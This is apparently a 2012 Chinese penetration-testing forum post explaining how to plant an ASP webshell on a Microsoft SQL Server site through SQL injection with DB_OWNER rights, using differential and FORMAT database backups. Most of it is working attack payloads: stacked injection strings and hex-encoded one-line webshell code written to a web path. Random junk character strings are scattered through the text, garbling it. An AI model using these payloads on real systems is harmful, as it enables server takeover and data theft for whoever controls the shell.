中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进办法 [打印本页]

作者: admin    时间: 2012-11-9 21:31
标题: DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:- ?  E7 y1 r: g+ J! Q
, o7 K: B" R9 `8 w, b
减少备份文件大小,得到可执行的webshell成功率提高不少' e! l* [" X+ p' Z
一利用差异备份
+ X6 F: q0 x+ c2 w加一个参数WITH DIFFERENTIAL' N9 q4 t1 L+ w: v/ W

- B4 ^: ~  D' \2 h/ [12 h4 z# s1 x# j
2- r0 Q! v# L+ X& p: p! I$ \  r& X
3. _5 w2 n) S% o" e% ?
4
0 h1 L0 V. Q0 Q9 h declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ _- U8 W- `4 s. ccreate table [dbo].[xiaolu] ([cmd] [image]);1 }/ V1 L: R9 |8 C9 ^) \+ ^" {
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
+ l' F* g' V( J; G% l2 Hdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL & O: @- j1 [( v( W. W
  N/ p' [* w6 l
二利用完全FORMAT* r: Z' w& K3 G
加一个参数WITH FROMAT
: H( P4 ]1 o# m$ r6 m0 K有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以; ^  g0 L" o0 [* z4 O

" Z! i/ ~! `7 M- @+ z1
- b$ _# y" d5 n+ R29 j8 c3 }; L# f7 Y3 t) o8 ?5 l
3. C& T  D) A3 Z3 }4 o( D
4
- p7 @. Z3 g% W3 f declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' R, O$ D* U" z7 ccreate table [dbo].[xiaolu] ([cmd] [image]);) ]' [% D7 R$ e% M# J7 d& K
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E), y6 P" D7 b! [: s4 ?/ G& N
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
4 p; j3 u& N& G% J" m) |! P9 ]# _
( V, Z9 \- a  \0 q* ]5 s总的来说就是那么简单几句,下面以备份数据库model为例子0 I- Z8 [9 ^" D7 t: M% R1 Z; x
1
5 O9 x! }  a. \  y7 b0 C- a
5 }. e  e; V1 d6 ?8 U+ d1
3 ]( ]  L0 b3 Q% F' ^: j) y id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
* b8 g! e7 B; ?3 J/ I5 }6 I
' X2 Q  j. m1 s8 x. s2 j/ V2# ~0 a+ x" o: L2 z6 _1 h

- I& N  J: B7 \. ^. T# W& [1
3 f8 K9 M2 t) T9 |' t/ M id=1;backup database model to disk='你的路径‘ with differential,format;--
0 K. l; X% G, I6 N




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2